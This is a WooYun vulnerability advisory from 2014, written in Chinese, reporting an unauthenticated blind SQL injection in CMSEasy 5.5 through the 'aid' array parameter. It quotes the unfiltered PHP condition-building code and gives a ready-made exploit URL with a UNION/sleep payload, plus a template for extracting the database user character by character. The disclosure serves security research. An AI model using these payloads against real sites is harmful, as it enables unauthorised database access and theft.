当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075917

漏洞标题:cmseasy前台sql盲注(绕过union,sleep等函数,无需登录,无防御)

相关厂商:cmseasy

漏洞作者: menmen519

提交时间:2014-09-12 15:53

修复时间:2014-12-11 15:54

公开时间:2014-12-11 15:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-12: 细节已通知厂商并且等待厂商处理中
2014-09-13: 厂商已经确认,细节仅向厂商公开
2014-09-16: 细节向第三方安全合作伙伴开放
2014-11-07: 细节向核心白帽子及相关领域专家公开
2014-11-17: 细节向普通白帽子公开
2014-11-27: 细节向实习白帽子公开
2014-12-11: 细节向公众公开

简要描述:

cmseasy 前台sql盲注(绕过union,sleep等函数,无需登录,无防御)

详细说明:

archive_act.php:(line:27-33)

}
        front::check_type($this->pagesize);
        $announcement = new announcement();
        $this->view->announcements = $announcement->getrows(null, 10);
        $this->view->usergroupid = 1000;
        front::check_type(cookie::get('login_username'), 'safe');
        front::check_type(cookie::get('login_password'), 'safe');
        $this->view->showarchive = archive::getInstance()->getrow(front::get('aid'));
        $addcontentuser = new user();
        $addcontentuser = $addcontentuser->getrow(array('userid' => $this->view->showarchive['userid']));


这里有一句:
$this->view->showarchive = archive::getInstance()->getrow(front::get('aid'));
我们跟进去这个函数getrow:

function getrow($condition,$order='1 desc',$cols='*') {
        $this->condition($condition);
        return $this->rec_select_one($condition,'*',$order);
    }


然后在看看这个函数condition:

function condition(&$condition) {
        if (isset($condition) &&is_array($condition)) {
            $_condition=array();
            foreach ($condition as $key=>$value) {
                //$value=str_replace("'","\'",$value);
                $_condition[]="`$key`='$value'";
            }
            $condition=implode(' and ',$_condition);
        }
        else if (is_numeric($condition)) {
            $this->getFields();
            $condition="`$this->primary_key`='$condition'";
        }else if(true === $condition){


这里我们发现了如果传递进来的东西key没有做任何过滤,
我们发送请求:
url:http://192.168.10.70/CmsEasy_5.5_UTF-8_20140818_new/uploads/index.php?case=archive&aid[typeid%60%3d1%20UNION%20SELECT/**/1,2,3,if(1,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%23]=1
在后台抓取后看看是否效果sql语句完美执行:
SELECT * FROM `cmseasy_archive` WHERE `typeid`=1 UNION SELECT/**/1,2,3,if(1,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58#`='1' and (state IS NULL or state<>'-1') ORDER BY 1 desc limit 1
一个完美的sql语句执行完毕,这时候网页刷新时间为5秒钟,那么下来我们怎样去猜测字段
SELECT * FROM `cmseasy_archive` WHERE `typeid`=1 UNION SELECT/**/1,2,3,if(ascii(substr(user(),1,1))=$NUM,sleep(if(1,5,1)),1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58#`='1' and (state IS NULL or state<>'-1') ORDER BY 1 desc limit 1
我们可以改变$NUM的值 这里要进行urlencode
ok剩余的就不解释了

漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-09-13 07:58

厂商回复:

感谢

最新状态:

暂无